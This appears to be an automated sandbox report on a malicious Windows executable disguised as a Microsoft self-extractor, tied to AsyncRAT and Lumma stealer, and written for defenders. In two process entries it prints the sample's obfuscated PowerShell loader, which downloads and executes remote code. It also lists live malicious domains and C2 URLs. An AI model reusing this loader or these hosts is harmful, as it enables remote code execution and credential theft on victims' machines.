File name:

FdqlBTs.exe

Full analysis: https://app.any.run/tasks/cf888072-d998-4ae8-b5b9-a0cad8a418bd
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on GitHub as legitimate open-source remote administration software, but attackers abuse its many powerful functions for malicious purposes.

Analysis date: March 24, 2025, 21:03:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
stegocampaign
stealer
lumma
rat
asyncrat
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

1B129D080655A4C9F703A5DCE0195512

SHA1:

9EC187C55FC3F50D98C372A96913FD38462C4EBF

SHA256:

EE5C9B3DC922C0D16FD7A1E1D72C3530F9AEE1209A233764F8280EE7DBC3B353

SSDEEP:

6144:Po1GDF7f25lw/lJj2LnT25qndIjjVV8qtynD:Po1G57u5lw/qLnT25qndIPVVRtyD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 8048)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8048)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 8048)
    • Executes an application with conhost.exe as parent process

      • powershell.exe (PID: 7372)
    • LUMMA mutex has been found

      • RegAsm.exe (PID: 7344)
    • Gets information about running processes via WMI (SCRIPT)

      • wscript.exe (PID: 7380)
    • Connects to the CnC server

      • powershell.exe (PID: 7372)
    • Actions look like stealing of personal data

      • RegAsm.exe (PID: 7344)
    • Steals credentials from Web Browsers

      • RegAsm.exe (PID: 7344)
    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 7372)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • FdqlBTs.exe (PID: 7704)
    • Starts CMD.EXE for commands execution

      • FdqlBTs.exe (PID: 7704)
    • Executing commands from a ".bat" file

      • FdqlBTs.exe (PID: 7704)
    • Uses WMIC.EXE to obtain CPU information

      • cmd.exe (PID: 7724)
    • Starts a Microsoft application from unusual location

      • FdqlBTs.exe (PID: 7704)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7724)
      • powershell.exe (PID: 7944)
      • conhost.exe (PID: 7276)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 7724)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 8048)
    • Application launched itself

      • powershell.exe (PID: 7944)
    • Gets information on the list of running processes

      • powershell.exe (PID: 7944)
    • Probably download files using WebClient

      • powershell.exe (PID: 7944)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8048)
    • The process executes JS scripts

      • cmd.exe (PID: 7724)
    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 7380)
    • Executed via WMI

      • conhost.exe (PID: 7276)
    • There is functionality for taking screenshots (YARA)

      • RegAsm.exe (PID: 7344)
    • Contacting a server suspected of hosting a CnC

      • powershell.exe (PID: 7372)
    • Searches for installed software

      • RegAsm.exe (PID: 7344)
  • INFO

    • The sample is compiled with English language support

      • FdqlBTs.exe (PID: 7704)
    • Creates files in a temporary directory

      • FdqlBTs.exe (PID: 7704)
      • powershell.exe (PID: 8048)
    • Checks supported languages

      • FdqlBTs.exe (PID: 7704)
      • RegAsm.exe (PID: 7344)
    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 7780)
      • powershell.exe (PID: 8048)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7944)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 7944)
    • Reads the software policy settings

      • powershell.exe (PID: 8048)
      • RegAsm.exe (PID: 7344)
      • slui.exe (PID: 5800)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7944)
    • Disables trace logs

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8048)
    • Checks proxy server information

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)
      • slui.exe (PID: 5800)
    • Reads the machine GUID from the registry

      • RegAsm.exe (PID: 7344)
    • Reads the computer name

      • RegAsm.exe (PID: 7344)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7372)
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2090:06:11 09:36:52+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.26
CodeSize: 32768
InitializedDataSize: 163840
UninitializedDataSize: -
EntryPoint: 0x8460
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 11.0.20348.1
ProductVersionNumber: 11.0.20348.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.20348.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.20348.1
No data.
All screenshots are available in the full report
Total processes: 137
Monitored processes: 14
Malicious processes: 7
Suspicious processes: 1

Behavior graph

Processes shown in the graph (interactive view available in the full report): fdqlbts.exe, cmd.exe, conhost.exe, wmic.exe, find.exe, powershell.exe, powershell.exe (#STEGOCAMPAIGN), svchost.exe, regasm.exe, regasm.exe (#LUMMA), wscript.exe, conhost.exe, powershell.exe (#ASYNCRAT), slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 5800
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 7276
CMD: conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
Path: C:\Windows\System32\conhost.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 7288
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.8.9037.0 built by: NET481REL1
PID: 7344
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
PID: 7372
CMD: powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: conhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 7380
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IXP000.TMP\2.js"
Path: C:\Windows\System32\wscript.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
PID: 7704
CMD: "C:\Users\admin\Desktop\FdqlBTs.exe"
Path: C:\Users\admin\Desktop\FdqlBTs.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Win32 Cabinet Self-Extractor
Exit code:
0
Version:
11.00.20348.1 (WinBuild.160101.0800)
PID: 7724
CMD: cmd.exe /c 1.bat && 2.js
Path: C:\Windows\System32\cmd.exe
Parent process: FdqlBTs.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 7732
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Total events: 24 012
Read events: 24 010
Write events: 2
Delete events: 0

Modification events

PID: 7724, Process: cmd.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation: write
Name: JSFile
Value:
PID: 7380, Process: wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation: write
Name: JScriptSetScriptStateStarted
Value: F220110000000000
Executable files: 0
Suspicious files: 2
Text files: 9
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID: 7944, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pbwasygv.qvs.psm1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 8048, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1gptron2.3gh.ps1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 8048, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0qzrzqdo.nqe.ps1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 8048, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_klz5xj50.c2l.psm1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 7704, Process: FdqlBTs.exe, Filename: C:\Users\admin\AppData\Local\Temp\IXP000.TMP\1.bat, Type: text
MD5: F6A8B35F102210019DCE8177B1DF901C
SHA256: 1F0AEE2640D4748C088BD4AA0B8BEF5323ADD0778731FDFD3FA4D12ADDA1487B
PID: 7704, Process: FdqlBTs.exe, Filename: C:\Users\admin\AppData\Local\Temp\IXP000.TMP\2.js, Type: binary
MD5: FAE294BEEEA146FCC79C6BA258159550
SHA256: 0DB879398B091AAA19FE58C398B589C47A9E78194600CFDFF150C50F4EF40E31
PID: 7372, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v0zsuqdb.dod.ps1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 7372, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sijntjuw.pqc.psm1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 7944, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yqrh2jj5.0u5.ps1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 8048, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hzsu14x4.mzs.psm1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 14
TCP/UDP connections: 29
DNS requests: 12
Threats: 6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6392
RUXIMICS.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
POST
200
104.21.78.80:443
https://soliduso.digital/QUDis
unknown
binary
68 b
POST
200
172.67.218.154:443
https://soliduso.digital/QUDis
unknown
binary
43 b
POST
200
104.21.78.80:443
https://soliduso.digital/QUDis
unknown
binary
68 b
POST
200
172.67.218.154:443
https://soliduso.digital/QUDis
unknown
binary
68 b
GET
200
185.199.110.153:443
https://ofice365.github.io/1/test.jpg
unknown
image
5.48 Mb
GET
200
192.96.205.175:443
https://shivalikhyundai.co.in/images/cdghaah.txt
unknown
text
492 Kb
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
7372
powershell.exe
GET
302
185.250.151.155:80
http://ebmmnhkldkhdlbk.top/bn68qiewjfhtr.php?id=DESKTOP-JGLLJLD&key=74532125735&s=flibabc11
unknown
unknown

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6392
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:137
unknown
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
unknown
6392
RUXIMICS.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
unknown
8048
powershell.exe
185.199.108.153:443
ofice365.github.io
FASTLY
US
unknown
8048
powershell.exe
192.96.205.175:443
shivalikhyundai.co.in
LEASEWEB-USA-WDC
US
unknown
7344
RegAsm.exe
172.67.218.154:443
soliduso.digital
CLOUDFLARENET
US
unknown
7372
powershell.exe
2.58.15.254:80
baredaseco.pro
ASN-QUADRANET-GLOBAL
NL
unknown
7372
powershell.exe
185.250.151.155:80
ebmmnhkldkhdlbk.top
MIRholding B.V.
US
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
unknown
google.com
  • 216.58.206.78
unknown
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
unknown
ofice365.github.io
  • 185.199.108.153
  • 185.199.109.153
  • 185.199.110.153
  • 185.199.111.153
unknown
shivalikhyundai.co.in
  • 192.96.205.175
unknown
soliduso.digital
  • 172.67.218.154
  • 104.21.78.80
unknown
baredaseco.pro
  • 2.58.15.254
unknown
ebmmnhkldkhdlbk.top
  • 185.250.151.155
unknown
4xqqasqjdti51qa.com
unknown
activation-v2.sls.microsoft.com
  • 40.91.76.224
unknown

Threats

PID
Process
Class
Message
7372
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2196
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
7372
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
7372
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
7372
powershell.exe
Malware Command and Control Activity Detected
ET MALWARE AsyncRAT Victim Checkin
1 ETPRO signature available at the full report
No debug info